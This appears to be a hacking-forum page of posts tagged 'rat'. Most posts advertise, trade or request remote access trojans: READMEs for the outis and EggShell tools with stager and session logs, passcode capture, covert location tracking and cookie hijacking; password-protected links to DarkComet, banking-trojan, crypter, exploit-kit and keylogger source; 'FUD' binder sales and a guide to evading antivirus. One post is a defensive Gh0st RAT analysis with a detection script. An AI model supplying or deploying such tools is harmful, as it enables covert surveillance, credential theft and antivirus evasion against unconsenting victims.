Showing results for tags 'rat'.

Found 12 results

  1. Hi, I need someone with a good RAT, one that is easy to use and undetectable. I am willing to buy it or to pay for an interesting job. If there is someone who has a very good handle on this and you like challenges, please write to me.
  2. outis

     outis is a custom Remote Administration Tool (RAT) or something like that. Think Meterpreter or Empire-Agent. However, the focus of this tool is neither an exploit toolkit (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms.

     On the Name

     The cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is "Outis", meaning "Nobody" in ancient Greek. Thus, when Polyphemus later shouted that Nobody was about to kill him, strangely no help arrived. My thanks to Marcel for remembering this marvelous piece of classic tale.

     Dependencies for the Handler

     Archlinux users can install the following packages:

         python3 # includes cmd, tempfile, ...
         python-progressbar2
         python-dnspython
         python-crypto
         python-pyopenssl

     and maybe more... In other distributions the names may differ; for instance, there is a module named crypto and a module named pycrypto. We need the latter. Also, older versions might cause problems: pyopenssl needs to be version 16.1.0 or newer, check as follows:

         $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'

     You can set up a python virtual environment quite easily:

         $ virtualenv outis-venv
         $ source ./outis-venv/bin/activate
         (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl

     This results in the following package list, which seems to work for me:

         $ pip freeze
         appdirs==1.4.3
         asn1crypto==0.22.0
         cffi==1.10.0
         cryptography==1.8.1
         dnspython==1.15.0
         idna==2.5
         packaging==16.8
         progressbar2==3.18.1
         pycparser==2.17
         pycrypto==2.6.1
         pyOpenSSL==16.2.0
         pyparsing==2.2.0
         python-utils==2.1.0
         six==1.10.0

     Installation

     Clone this git with the recursive flag to also clone its submodules in the thirdpartytools folder:

         git clone --recursive ...

     The handler runs on Python 3. Install its dependencies and run it.
     It will generate stagers, agents and everything else for you. To bind low ports without needing root privileges, consider using a capability wrapper.

     Terms

       • agent: software that runs on the victim system
       • handler: software that parses your commands and leads the agents (usually it runs on your server)
       • stager: short script that downloads the agent (using the transport module) and runs it
       • transport: communication channel between stager/agent and handler, e.g. ReverseTCP
       • platform: victim architecture to use for stager/agent scripts, e.g. PowerShell

     Currently Supported Platforms

       • PowerShell (partial)

     Currently Supported Transports

       • Reverse TCP
       • DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection)

     Currently Supported Cryptography

       • Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR
       • Agent stages can be authenticated using RSA signatures and pinned certificates
       • Transport connections can be encrypted / authenticated using TLS and pinned certificates

     Currently Supported Commands and Controls

       • ping requests to test the connection (partial)
       • text message format (partial)
       • upload and download of files

     Currently Supported Extras

     When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS).
     Usage Examples

     Download of a file using staged DNS transport with the POWERSHELL platform could look like this:

         $ outis
         outis> set TRANSPORT DNS
         outis> set ZONE zfs.sy.gs
         outis> set AGENTDEBUG TRUE
         outis> info
         [+] Options for the Handler:
         Name              Value      Required Description
         ----------------- ---------- -------- -----------------------------------------------------------------
         TRANSPORT         DNS        True     Communication way between agent and handler (Options: REVERSETCP, DNS)
         CHANNELENCRYPTION TLS        True     Encryption Protocol in the transport (Options: NONE, TLS)
         PLATFORM          POWERSHELL True     Platform of agent code (Options: POWERSHELL)
         PROGRESSBAR       TRUE       True     Display a progressbar for uploading / downloading? (only if not debugging the relevant module) (Options: TRUE, FALSE)
         [+] Options for the TRANSPORT module DNS:
         Name      Value       Required Description
         --------- ----------- -------- ------------------------------------------------------------------------
         ZONE      zfs.sy.gs   True     DNS Zone for handling requests
         LHOST     0.0.0.0     True     Interface IP to listen on
         LPORT     53          True     UDP-Port to listen on for DNS server
         DNSTYPE   TXT         True     DNS type to use for the connection (stager only, the agent will enumerate all supported types on its own) (Options: TXT, A)
         DNSSERVER             False    IP address of DNS server to connect for all queries
         [+] Options for the PLATFORM module POWERSHELL:
         Name                 Value                      Required Description
         -------------------- -------------------------- -------- ----------------------------------------------
         STAGED               TRUE                       True     Is the communication setup staged or not? (Options: TRUE, FALSE)
         STAGEENCODING        TRUE                       True     Should we send the staged agent in an encoded form (obscurity, not for security!) (Options: TRUE, FALSE)
         STAGEAUTHENTICATION  TRUE                       True     Should the stager verify the agent code before executing (RSA signature verification with certificate pinning) (Options: TRUE, FALSE)
         STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem   False    File path of a PEM with both RSA key and certificate to sign and verify staged agent with (you can generate a selfsigned cert by using the script gencert.sh initially)
         AGENTTYPE            DEFAULT                    True     Defines which agent should be used (the default outis agent for this platform, or some third party software we support) (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)
         TIMEOUT              9                          True     Number of seconds to wait for each request (currently only supported by DNS stagers)
         RETRIES              2                          True     Retry each request for this number of times (currently only supported by DNS stagers)
         AGENTDEBUG           TRUE                       True     Should the agent print and log debug messages (Options: TRUE, FALSE)
         outis> generatestager
         [+] Use the following stager code:
         powershell.exe -Enc [base64-encoded stager omitted]
         outis> run
         [+] DNS listening on 0.0.0.0:53
         [+] Sending staged agent (34332 bytes)...
         100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16
         [+] Staging done
         [+] Waiting for connection and TLS handshake...
         [+] Initial connection with new agent started
         [+] Upgrade to TLS done
         outis session>
         [+] AGENT: Hello from Agent
         outis session> download C:\testfile.txt /tmp/out.txt
         [+] initiating download of remote file C:\testfile.txt to local file /tmp/out.txt
         [+] agent reports a size of 3295 bytes for channel 1
         100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00
         [+] wrote 3295 bytes to file /tmp/out.txt
         outis session> exit
         Do you really want to exit the session and close the connection [y/N]? y
         outis> exit

     Or maybe we want to use dnscat2 for the real deal and just use outis to stage it:

         $ outis
         outis> set TRANSPORT DNS
         outis> set AGENTTYPE DNSCAT2
         outis> set ZONE zfs.sy.gs
         outis> run
         [+] DNS listening on 0.0.0.0:53
         [+] Sending staged agent (406569 bytes)...
         100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17
         [+] Staging done
         [+] Starting dnscat2 to handle the real connection
         New window created: 0
         New window created: crypto-debug
         Welcome to dnscat2! Some documentation may be out of date.
         auto_attach => false
         history_size (for new windows) => 1000
         Security policy changed: All connections must be encrypted and authenticated
         New window created: dns1
         Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = zfs.sy.gs]...
         Assuming you have an authoritative DNS server, you can run the client anywhere with the following (--secret is optional):
           ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs
         To talk directly to the server without a domain name, run:
           ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==
         Of course, you have to figure out <server> yourself! Clients will connect directly on UDP port 53.
         dnscat2> New window created: 1
         Session 1 Security: ENCRYPTED AND VERIFIED!
         (the security depends on the strength of your pre-shared secret!)
         dnscat2> sessions
         0 :: main [active]
           crypto-debug :: Debug window for crypto stuff [*]
           dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]
           1 :: command (feynman-win7) [encrypted and verified] [*]
         dnscat2> session -i 1
         New window created: 1
         history_size (session) => 1000
         Session 1 Security: ENCRYPTED AND VERIFIED!
         (the security depends on the strength of your pre-shared secret!)
         This is a command session!
         That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'.
         command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt
         Attempting to download c:/testfile.txt to /tmp/out.txt
         Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!
         command (feynman-win7) 1> exit
         Input thread is over

     Inspirations

     This project was inspired by (and shamelessly stole part of its code from):

     Empire:
       - https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py — generate_launcher uses a HTTP(S) stager
       - https://github.com/adaptivethreat/Empire/tree/master/data/agent — stager (step two after initial launcher) and agent (step three)
       - https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py — powershell script generation and stripping
     Metasploit:
       - https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb — CmdStager for bourne, ...
     ReflectiveDLLInjection:
       - https://github.com/stephenfewer/ReflectiveDLLInjection
     p0wnedShell:
       - https://github.com/Cn33liz/p0wnedShell — some ideas for AMSI evasion for future use
     dnscat2:
       - https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md — ideas on protocol design over DNS
       - https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 — powershell version of the dnscat2 agent
     dnsftp:
       - https://github.com/breenmachine/dnsftp — short script parts for stagers via DNS

     Disclaimer

     Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

     Download outis-master.zip or git clone https://github.com/SySS-Research/outis.git

     Source: https://github.com/SySS-Research/outis
  3. Brief Overview

     EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploit's "Meterpreter", I decided to create a better, native, secure, and easier tool with most, if not more, commands for macOS and jailbroken iOS devices. This tool creates a bash payload that spawns a command line session with the target, including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES.

     Encrypted Communication

     All data sent between the server and target is encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started.

     Getting Started

     To use EggShell, you must have pycrypto and Python 2.7.x installed. Install using git (macOS/Linux):

         git clone https://github.com/neoneggplant/EggShell
         cd EggShell
         python eggshell.py

     Create And Run A Payload

     Using the menu, we can choose to create a bash payload; this is what will be run on the target machine. It is a 2 stage payload: it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary.

     Example: running the created payload on our target

     Back on our server, we can see we received a connection and an eggshell session has been started!

     macOS Commands

         ls : list contents of directory
         cd : change directories
         rm : delete file
         pwd : get current directory
         download : download file
         picture : take picture through iSight camera
         getpid : get process id
         openurl : open url through the default browser
         idletime : get the amount of time since the keyboard/cursor were touched
         getpaste : get pasteboard contents
         mic : record microphone
         brightness : adjust screen brightness
         exec : execute command
         persistence : attempts to connect back every 60 seconds
         rmpersistence : removes persistence

     iOS Commands

         sysinfo : get system information
         ls : list contents of directory
         cd : change directories
         rm : delete file
         pwd : get current directory
         download : download file
         frontcam : take picture through front camera
         backcam : take picture through back camera
         mic : record microphone
         getpid : get process id
         vibrate : make device vibrate
         alert : make alert show up on device
         say : make device speak
         locate : get device location
         respring : respring device
         setvol : set mediaplayer volume
         getvol : view mediaplayer volume
         isplaying : view mediaplayer info
         openurl : open url on device
         dial : dial number on device
         battery : get battery level
         listapps : list bundle identifiers
         open : open app
         persistence : installs LaunchDaemon – tries to connect every 30 seconds
         rmpersistence : uninstalls LaunchDaemon
         installpro : installs eggshellpro to device

     EggShellPro Commands (Cydia Substrate Extension)

         lock : simulate lock button press
         wake : wake device from sleeping state
         home : simulate home button press
         doublehome : simulate home button double press
         play : plays music
         pause : pause music
         next : next track
         prev : previous track
         getpasscode : log successful passcode attempts
         unlock : unlock with passcode
         keylog : log keystrokes
         keylogclear : clear keylog data
         locationservice : turn on or off location services

     EggShell Pro

     EggShell Pro is a Cydia substrate library that takes advantage of the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has been unlocked with. When interacting with an iOS device, simply run "installpro" and the dylib file will upload to the device, followed by a respring.

     Navigating/Downloading Files

     EggShell has a command line interface like feel to it. Using the unix-like commands built into eggshell, we can print the working directory (pwd), list a directory (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine.

     Taking Pictures

     Taking a photo with the "picture" command on macOS will activate the iSight camera and send the image data back to the server. To take a picture on iOS, use "frontcam" or "backcam".

     iOS Location Tracking Even With Location Services Off

     EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps.

     iOS Getting Passcode

     EggshellPro hooks into lock screen functions and logs the device's passcode in memory on any successful unlock. When we run "getpasscode" we are sent back the passcode that was used last to unlock the device.

     macOS Hijacking Safari Facebook Sessions

     With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use them to log in on another browser.

     macOS Persistence

     To achieve persistence, even without being root, the command "persistence" adds the payload to the crontab file. It attempts to re-connect every 60 seconds, even after a reboot. To remove persistence, simply enter "rmpersistence" and it should remove itself from crontab.

     Recording Audio

     Using the "mic record" command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run "mic stop"; this will stop the recording of audio and download the audio data.

     Handling Multiple Sessions

     With the built-in feature "MultiServer", we can listen for multiple connections. Below is an example with 2 connections on the same device; however, this can be done with multiple devices. As we connect to targets, we can use "sessions" to list all the active sessions, "interact" to interact with a session, "close" to close session numbers, and "back" to go back to the multiserver console.

     Payloads In Apps

     Payloads can easily be added inside of apps. Below is an example of using the "system()" function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS. Immediately after running the app, our payload is run and, just as expected, we have a connection.

     Safari Exploit + EggShell

     Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro.

     Original Video

     Thanks For Viewing
     lucasjackson5815@gmail.com

     Download: EggShell-master.zip

     Source: http://lucasjackson.me/index.php/eggshell/
  4. So I decided to share with you guys this little "collection" of the DarkComet RAT I had. It's from versions 4.0 to 5.3.1 - to be honest, for me those were the best versions of DarkComet.

     Extra items added:
     Celesty Binder:
     Pictures of Celesty Binder:
     Extension Spoofer:

     IF OR WHEN YOU DO DECIDE TO MAKE A VIRUS SCAN, PLEASE NOTE THAT DARKCOMET BUILDS VIRUSES, A POWERFUL ONE. DO NOT COME TO ME OR TO THIS THREAD TO POST SUCH THINGS AS "It's infected! Don't download. I scanned it on Virustotal and it was detected as malware!". OF COURSE IT WAS, BECAUSE IT BUILDS THEM.

     [*] Those are known as "false positives", just to let you know. Unless whatever other malicious building program you download(ed) really is backdoored.
     [*] And for your safety, I will provide you all with a very, and I mean VERY, helpful tool(s). This site is trusted, and it has tools that will probably save your computer from skids that are learning how to use RATs; you don't need to buy these tools, they are completely free. It also has other cool stuff like some legal keyloggers if you wanna check them out.

     Download for the DarkComet RAT 4.0 - 5.3.1 Full Versions: http://tinyurl.com/l9u8xxz

     +And as always, be careful with downloads out there; hopefully, knowing what they are capable of doing from this RAT, you'll be safer. And also remember that the DarkComet remover is for DarkComet RATs only!, not for any other RATs. This also has no match against a crypted STUB.

     Password to the file: powersafe

     Source: HackForums
  5. This is a tool that allows you to control your computer from anywhere in the world, with full support for Unicode languages.

     Latest Features:
       1. Reprogrammed from scratch
       2. A simple amendment to the Alsuchit to make it lighter than the previous one
       3. Corrects some of the mistakes, and corrects copying the value in the Registry
       4. Amendment to the capture of the screen, faster than the previous version
       5. Password pulling is stronger than the previous version; in addition, any update is brought when you save your password
       6. [Transfer] feature in the file manager, to see transport and lifting, with full control
       7. New additions in Builder
       8. The server became smaller in size [83 KB]
       9. Many changes in this version

     rghost.net/7QQZs742M

     Have fun.
  6. 50% DISCOUNT FOR THE FIRST 10 BUYERS

     SCAN RESULT

     Features
       * GUI and inbuilt stub are coded in C++
       * No dependencies
       * Assembly change
       * FUD

     Attention!!!!! If you bind infected files, your bound file will be infected too! So be careful.

     Contact me
     Skype: snippy.boy
  7. This project is intended for malware developers, researchers or other security experts. This is the final release of this project, which contains:

     Android Source
         Dendroid
     Size: 5.47 MB
     Download: http://speedy.sh/brmnE/Android-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: e06a9a222a623dea995877129f1124541f571ca3
     ======================
     Banking-Trojans-Source
         bootkit hunter or zusy bot iBanking JHTTP source PowerLoader Spy eye v1.0 tinibanker Zemra ZeuS 2.0.8.9
     Size: 42.36 MB
     Download: http://speedy.sh/NScsB/Banking-Trojans-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: 56a56a9bea910a56d5398a43faae110f51f7999c
     ======================
     Binders-Source
         Azazel Binder BBinder Stubgen Binder Joiner Biohazard Binder BlindSpotv1.0 (Binder) C++ Files Merger Danger Zone Binder Devil Binder 1.0 [SRC](VB6) Ejemplo Binder JABT1.2 - Justin Another Binder Tool Little Joiner NRG Binder Picture Binder Viotto Binder XP0wer CrypterBinder
     Size: 6.87 MB
     Download: http://speedy.sh/fJ58N/Binders-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: 8bac687326d3cdde2bc45ad3ac7b7fc693dc0355
     ======================
     Botnet-Source
         [file listing omitted]
     Size: 190.74 MB (200,005,186 bytes)
     Download: http://speedy.sh/chjZT/Botnet-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: 849f862af76c327caef0c41037c24858c072abc3
     ======================
     Crypters-Source
         Abstract Crypter Carb0n Crypter v1.7 [C++]darkcrypt0r Christmas Crypter CodingNation Crypter Crypter Crypter v1 Cryptic3source-Crypter Cryptosy Cryptosy Crypter Cyber Crypt 7 D0pe Crypter Dark Matrix Crypter DR True Crypter DW Crypter DYnAsTYCrypTeR UsG Evil Crypter v1 Fire Crypter Fly Crypter Indetectables Crypter m3m0s Crypter v2.0 Niller Crypter Njw0rm rat v3.5 NT Crypter v2 OhShin Crypter Open crypter Peacefull Crypter Poly Crypter Polymorphic crypter ProCrypter - Stubgen Rainerstoff Crypter redix crypter Relapse Private VB6 Crypter Royal crypter Runtime Crypter Schwarze Sonne crypter SkuLLByte Crypter Sotpot Simple Crypter Strong Crypt TNT Crypter Tughack crypter VB Crypter VBCrypto White-Crypt White Crypter
     Size: 16.43 MB
     Download: http://speedy.sh/ZAC8X/Crypters-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: d27b9bc54ec1d64bb098b93dc0a2f1ac9d6739e1
     ======================
     DDoS-Tools-Source
         ATTBooter DDoS UDP-Tunnel
     Size: 6.09 MB
     Download: http://speedy.sh/hezFt/DDoS-Tools-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: d55c1bd0bc74c83eb8a83ae1d364550b409d88f1
     ======================
     Exploit-Kits-Source
         blackhole102 BleedingLife2 Crimepack3.1.3 eleonorev1 1.4.4 firepack Fragus BlacK ice-pack-3 Phoenix2.5 RIG sakura Sava Exploits Pack
     Size: 40.7 MB
     Download: http://speedy.sh/Exny4/Exploit-Kits-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: d66bad2a12c58695b0af23ae7a04a4700b5869c2
     ======================
     Keylogger-Source
         basic keylogger source Ejemplo keylogger Keylog Keylogger Keylogger Keylogger 2 Keylogger by Kyzer23 Keylogger C Keylogger C 1 Keylogger C 2 Keylogger C 3 Keylogger Cpp Keylogger FTP Sharp Keyloger v1.0
     Size: 1.49 MB
     Download: http://speedy.sh/AFrz7/Keylogger-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: e9b0d8a8aab75c67eb5a3688e74e4825937678c7
     ======================
     POS-Malware-Source
         dexter Pony 1.9 Alina POS
     Size: 38.59 MB
     Download: http://speedy.sh/chj2T/POS-Malware-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: e0e73d3957486cf65c5af27781ab6d24d4052fbc
     ======================
     RAT-Source
         AryanSourceRelease Blackshade FBI-RAT psyb Spy-net.2.7.beta Aero-Rat Agony Alte RAT Armageddon RAT BioNukE RAT Black Dream RAT BlueRAT Crypter Breaksoft RAT Ciccio RAT derSphear RAT Error 404 RAT Evoloution RAT F0xit 0.1 Fasito RAT FearRAT gh0st3.6 src HandleX RAT Heat RAT LocustPEA Messiah v2.0 RAT Minimo RAT Monk RAT Omega v1.1 RAT ProAgent V1.21 source Rat-b RAT Phillipp RAT Remote Administration Tool Storm v1.0 RAT
     Size: 113.45 MB
     Download: http://speedy.sh/wc346/RAT-Source.zip
     Password: Thanks_for_downloading_ping_sec
     sha1sum: 9294863ce7833fa8857fedba4915a9aea9b14dc5
     ==============================================
  8. This video demonstrates how to make a darkcomet rat undetectable.
P.S. these are the names of tools needed for it to work:
[C#] Source Code Generator V4.0 Final
DeepSea Obfuscator.v4.0.1.16.full
DNGuard HVM.Enterprise 3.60 cracked-SND
DarkComet Version 5.3.1
Microsoft visual studio
  9. In this article series, we will learn about one of the most predominant malware families, named Gh0st RAT, whose source code dates back to 2001 but is still relevant today. In this article series, we will learn what exactly Gh0st RAT is, all its variants, how it works, its characteristics, etc.

What is Gh0st RAT?

Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.

Gh0st RAT capabilities

I think that before I delve into more technical details of Gh0st RAT, let us take a brief look at the capabilities or reach of Gh0st RAT. Below is a list of Gh0st RAT capabilities. Gh0st RAT can:
- Take full control of the remote screen on the infected bot.
- Provide real time as well as offline keystroke logging.
- Provide live feed of webcam, microphone of infected host.
- Download remote binaries on the infected remote host.
- Take control of remote shutdown and reboot of host.
- Disable infected computer remote pointer and keyboard input.
- Enter into shell of remote infected host with full control.
- Provide a list of all the active processes.
- Clear all existing SSDT of all existing hooks.

Gh0st RAT Components

This section will throw light on both the user and kernel level binaries of the Gh0st RAT toolset. Gh0st RAT has two main components: client and server.

Controller Application: This is known as the client, which is typically a Windows application that is used to track and manage Gh0st servers on remote compromised hosts. The two main functions this module serves are the management and control of Gh0st servers and the ability to create customized server install programs.

Windows DLL (user level binary): The DLL is named SVCHOST.DLL. It is the Windows DLL that gets installed on a compromised host as a Windows service. This service is the server component of the Gh0st toolkit. It checks in to the Gh0st client on startup and awaits instructions.
The setup and installation of this DLL as a service is done by the install program (Dropper) SERVER.EXE, which we will discuss in a short while.

INSTALL.EXE: The Dropper application is used to install SVCHOST.DLL. This is a stand-alone Windows application that contains all required code to prepare a compromised host for the installation of the Gh0st RAT server service and the launching of that service.

Kernel Level Binary: This is present in the toolset with the .SYS filename RESSDT.SYS. This is a very small device driver that performs a single task: resetting the Windows System Service Dispatch Table (SSDT). This is the only kernel level binary in the toolset. It runs at system startup on the compromised host and removes all hooks in the SSDT.

Install Program: This is commonly called “the dropper.” It contains the two above described binaries and performs all of the work necessary to install the Gh0st server on a host and start up the Gh0st service.

Gh0st RAT Variants

Since Gh0st RAT source code is available for everyone, Gh0st RAT has many versions available, as people have generally used and even modified the code to fit their purpose. Gh0st, because of its number of variants and encrypted capabilities, is hard to recognize. Most antivirus detections today are automatically generated, resulting in names thought out by machines: quick, but containing information only machines find interesting.

The most stable indicator of being faced with a Gh0st RAT is its network communication. It is well documented and quite distinctive, as it always begins with a “magic word”, which in its default configuration is “Gh0st” – thus Gh0st RAT. As one can imagine, the detection of the “Gh0st” keyword in the network stream is pretty easy, as tools like a Network Intrusion Prevention System (NIPS) or even Wireshark are easily available and the magic words have a fixed length of 5 bytes.
So the below key words are from the investigations guide that contains all the magic words from a Gh0st network stream:

“7hero, Adobe, B1X6Z, BEiLa, BeiJi, ByShe, FKJP3, FLYNN, FWAPR, FWKJG, GWRAT, Gh0st, GOLDt, HEART, HTTPS, HXWAN, Heart, IM007, ITore, KOBBX, KrisR, LUCKK, LURK0, LYRAT, Level, Lover, Lyyyy, MYFYB, MoZhe, MyRat, OXXMM, PCRat, QWPOT, Spidern, Tyjhu, URATU, W0LFKO, Wangz, Winds, World, X6RAT, XDAPR, Xjjhj, ag0ft, attac, cb1st, https, whmhl, xhjyk, 00000, ABCDE, apach, Assas, Blues, chevr, CHINA, cyl22, DrAgOn, EXXMM, Eyes1, Gi0st, GM110, Hello, httpx, kaGni, light, LkxCq, lvxYT, Naver, NIGHT, NoNul, Origi, QQ_124971919, Snown, SocKt, Super, Sw@rd, v2010, VGTLS, wcker, Wh0vt, wings, X6M9K, xqwf7, YANGZ”

The above is not an exhaustive list, and even magic keywords like “Spidern” and “W0LFKO” come with a non-standard length, unlike the usual 5 bytes. Other irregular magic keywords like “DrAgOn” and “QQ_124971919” do not even compress their network traffic like most other Gh0st variants do.

In the next article of this series, we will learn about Gh0st network connections, why it is difficult to control this type of attack, and what possible solutions for its control can be put in place.

References
http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf
http://www.mcafee.com/in/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf

Source
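A small detection helper, added here as an example and not code from the reposted article, that matches a TCP payload against the magic-word list quoted above and then checks the rest of the header so that benign data starting with "Adobe" or "HTTPS" is not flagged. The two little-endian length DWORDs plus zlib body after the magic word are an assumption stated in the code, and the packets it inspects are constructed for the demo.

```python
r"""Detection helper for Gh0st-style RAT traffic.

Added example, not code from the reposted article. Assumptions stated here:
after the magic word, the header is taken to be two little-endian DWORDs
(total packet length, uncompressed body length) followed by a zlib stream;
the magic-word table is a subset of the list quoted in the post; the packets
inspected under __main__ are constructed for the demo, not captured traffic.
"""
import struct
import zlib

# Subset of the magic words quoted in the post, plus the default "Gh0st".
GH0ST_MAGIC_WORDS = {
    b"Gh0st", b"7hero", b"Adobe", b"B1X6Z", b"BEiLa", b"BeiJi", b"ByShe",
    b"HEART", b"HTTPS", b"Heart", b"KOBBX", b"LURK0", b"LYRAT", b"Level",
    b"Lover", b"MyRat", b"PCRat", b"World", b"X6RAT", b"Gi0st", b"Wh0vt",
    # irregular-length variants the post calls out explicitly
    b"Spidern", b"W0LFKO", b"DrAgOn", b"QQ_124971919",
}
HEADER_FMT = "<II"  # assumed: total length, uncompressed length (little-endian)
HEADER_LEN = struct.calcsize(HEADER_FMT)


def match_magic(payload: bytes):
    """Return the magic word the payload starts with (longest match), else None."""
    for magic in sorted(GH0ST_MAGIC_WORDS, key=len, reverse=True):
        if payload.startswith(magic):
            return magic
    return None


def inspect_gh0st_stream(payload: bytes) -> dict:
    """Classify one TCP payload as 'clean', 'gh0st' or 'gh0st-uncompressed'.

    A magic-word hit alone is weak evidence ("Adobe", "HTTPS", "Hello" occur in
    benign traffic), so the length fields and the zlib body are checked too.
    """
    magic = match_magic(payload)
    if magic is None:
        return {"verdict": "clean", "magic": None, "reason": "no magic word"}
    name = magic.decode("ascii")
    body_off = len(magic) + HEADER_LEN
    if len(payload) < body_off:
        return {"verdict": "clean", "magic": name, "reason": "too short"}
    total_len, raw_len = struct.unpack_from(HEADER_FMT, payload, len(magic))
    if total_len != len(payload):
        return {"verdict": "clean", "magic": name, "reason": "length mismatch"}
    try:
        body = zlib.decompress(payload[body_off:])
    except zlib.error:
        # Variants such as "DrAgOn" send the body uncompressed (per the post),
        # so a consistent header with a non-zlib body is still worth flagging.
        return {"verdict": "gh0st-uncompressed", "magic": name, "body": payload[body_off:]}
    if len(body) != raw_len:
        return {"verdict": "clean", "magic": name, "reason": "raw length mismatch"}
    return {"verdict": "gh0st", "magic": name, "body": body}


def build_sample(magic: bytes, body: bytes, compress: bool = True) -> bytes:
    """Constructed test fixture in the assumed layout (not captured traffic)."""
    data = zlib.compress(body) if compress else body
    total = len(magic) + HEADER_LEN + len(data)
    return magic + struct.pack(HEADER_FMT, total, len(body)) + data


if __name__ == "__main__":
    samples = [
        build_sample(b"Gh0st", b"constructed demo body"),
        build_sample(b"DrAgOn", b"constructed demo body", compress=False),
        b"HTTPS://example.invalid/ benign text that merely starts with a magic word",
    ]
    for pkt in samples:
        print(inspect_gh0st_stream(pkt))
```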
  10. Which is the best RAT and where could I buy/download it... can you tell me where I could also buy a good crypter for this RAT... I'd be grateful.
  11. FULL RAT SETUP & SUPPORT 24/7

Do you want to have your own working rat but have no idea where to start? Do you need someone to set up everything for you? Do you need someone to teach you all you need to know? Do you need someone to answer all your questions on RATs?

I am a very experienced user in RATs and I am offering members of RST a Professional service to make sure you will have a working RAT in no time for almost no cost (not charging precisely, but I welcome gifts and appreciations).

General Functions
-----------------------
– Access and Administrate Computers from Anywhere
– Remote Customer Support
– Telecommuting
– Remote Access and Communication
– Remote File Management
– Remote System Activity Management
– Password recovery tool (Chrome, Safari, IE, FF, Filezilla, Windows Live Messenger, No-IP, IDM and many more)
– Keylogger
– Remote Shell (Command Interpreter)
– Web Downloader (HTTP)
– Screen Viewer
– Bandwidth Limiter
– Proxy Tunneling
– Reverse Socks 4/5 Proxy Server
– Local Applications Proxifier
– Data Transferring

List Of Rats
---------------------
1. Casa RAT
2. Back Orifice
3. Bandook RAT
4. Dark Comet Rat
5. Cerberus
6. Cybergate
7. Blackshades
8. Poison Ivy
10. Syndrome RAT
11. Team Viewer
12. Y3k RAT
13. Snoopy
15. 5p00f3r.N$ RAT
16. NetBus
17. SpyNet
18. P. Storrie RAT
19. Turkojan Gold
20. Bifrost
21. Lost Door
22. Beast
23. Shark
24. Sub7
25. Pain RAT
26. xHacker Pro RAT
27. Seed RAT
28. Optix Pro RAT
29. Dark Moon
30. NetDevil
31. Deeper RAT
32. MiniMo RAT

Contact: Send me a PM or email/chat me up on Yahoo IM: ratsetup247@yahoo.com
Jabber: ratsetup247@exploit.im
